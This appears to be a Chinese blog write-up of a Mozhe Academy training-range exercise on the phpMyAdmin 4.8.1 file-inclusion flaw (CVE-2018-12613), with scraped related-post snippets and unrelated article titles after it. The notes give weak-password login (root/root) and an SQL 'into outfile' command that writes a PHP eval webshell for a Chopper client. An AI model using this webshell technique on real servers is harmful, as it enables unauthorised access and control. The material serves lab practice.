墨者学院_phpMyAdmin后台文件包含分析溯源


phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
受影响版本:
phpMyAdmin 4.8.0和4.8.1受到影响
前台可以使用弱口令直接登录

1.打开靶场,看见登录窗口,使用弱口令登录(root,root)

2.在mysql下使用:select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php”
这里的hack是菜刀连接时候需要的口令
菜刀使用的链接是:http://219.153.49.228:48959/3.php
包含session文件。本次使用/tmp/sess_sessionid
在数据库窗口写入:
select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php” --> 这句是可以和菜刀连接的
select “<?php phpinfo();?>” into outfile “/var/www/html/3.php” --> 这句是在浏览器可以看到的

从之前的笔记整理出来的,可能有些乱,不过要点基本都在,需要的同学翻一翻

墨者学院_phpMyAdmin后台文件包含分析溯源相关推荐

  1. 墨者学院-phpMyAdmin后台文件包含分析溯源

    首先拿到题目到点击访问 访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器 账户密码:root   root 点击sql模块 对sql语句进行一个查询 首先查询sql写一句话的权限 我们可 ...

  2. 墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

    phpMyAdmin 第一种: 一.利用burp爆破出账号密码 二.尝试写马连入蚁剑 1.发现MySQL对导入导出没做任何限制 2.查询日志 3.利用日志写文件 4.访问写入的日志文件 6.尝试直接通 ...

  3. 墨者学院-登录密码重置漏洞分析溯源

    墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...

  4. [ 墨者学院 ] 命令执行——Bash漏洞分析溯源

    0x00.题目描述: 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞. 实训目标 1.了解bash: 2.了解Bash远程命令 ...

  5. 墨者学院tomcat后台弱口令漏洞利用

    墨者学院tomcat后台弱口令漏洞利用 点击之后要我们登录,这里abc123:999user是base64解码之后的结果,可见要爆破base64编码,这里不写爆破过程了,下一期出一下爆破过程,这里直接 ...

  6. 墨者学院-二维码文件分析

    墨者学院-二维码文件分析 首先用手机微信扫, 什么都没扫出来,然后将二维码保存到本地, 再上传 然后用草料二维码在线扫描得到一串链接,将wd后面的base64进行解码,二次解码得到key 解码两次得到 ...

  7. 墨者靶场 初级:Bash漏洞分析溯源

    墨者靶场 初级:Bash漏洞分析溯源 题目 背景介绍 实训目标 解题方向 解题步骤 题目 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命 ...

  8. 【墨者学院】WebShell文件上传漏洞分析溯源(第2题)

    替补选手的学习日记 靶场:墨者学院 题目:WebShell文件上传漏洞分析溯源(第2题) 1.打开是一个文件上传的提交框,正常上传一个txt文件看下返回结果. 2.看情况是限制了文件上传的后缀名,显示 ...

  9. 【墨者学院】WebShell文件上传漏洞分析溯源(第3题)

    替补选手的学习日记 靶场:墨者学院 题目:WebShell文件上传漏洞分析溯源(第3题) 1,打开页面依旧是熟悉的提交框,那么正常上传一个txt文件看下返回结果. 2.提示此文件不允许上传,应该是做了 ...

最新文章

  1. Blender纹理基础学习视频教程 CGCookie – Fundamentals of Texturing in Blender
  2. UITableView 添加长按手势UILongPressGestureRecognizer
  3. python下载教程win10-win10系统下如何安装Python软件
  4. 巧用httpModules实现网站域名更换
  5. Coursera公开课笔记: 斯坦福大学机器学习第四课“多变量线性回归(Linear Regression with Multiple Variables)”
  6. html div 自动聚焦,让DIV也能够获取焦点
  7. hdu 3819动态规划
  8. 天不知道地知道你不知道我知道谜底_温州这里有个7000平方米的“寻宝”地,你不知道就亏大了!...
  9. 2018最佳GAN论文回顾(上)
  10. visual studio (vs)常用快捷键
  11. 今日头条打造“悟空浏览器”;AirPods 3将在中国生产;谷歌再次被罚400万卢布|极客头条...
  12. python兼职程序员工资-Python 程序员的工资能有多高?
  13. php中怎样阻止网页进行跳转,PHP中阻止网页进行跳转的方法
  14. 一篇个人认为对RNN写的比较好的文章
  15. 盲盒商城源码|盲盒商城app开发的模式玩法、功能以及开发流程介绍,多套盲盒源码现成案例。让您在了解盲盒项目开发中少走弯路,少踩坑。
  16. 淘宝联盟api对接,实现优惠券查询功能
  17. 阿里云Dataworks
  18. 灌木修剪机的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
  19. 无线局域网WLAN的入门概念
  20. CentOS8下载及设置安装源(最新设置)

热门文章

  1. 好佳居软装十大品牌-软装窗帘如何去选择
  2. mysql查看表结构的几种方式
  3. 苹果air3安兔兔html5是什么,iPad Air 3的5大预测重点!
  4. lapack安装 matlab,如何使用MATLAB提供的BLAS库?
  5. java整数类型计算百分比
  6. C语言学生学籍信息管理系统源码附赠实验报告
  7. 人体骨骼关键点检测综述(2)
  8. Fragment的详细介绍和使用方法
  9. 小米6.0系统手机一键激活XPOSED框架的教程
  10. 栅格图像 转_RAC软件课堂丨这项AI图像描摹,90%的人都不知道!学会就是出图大佬!...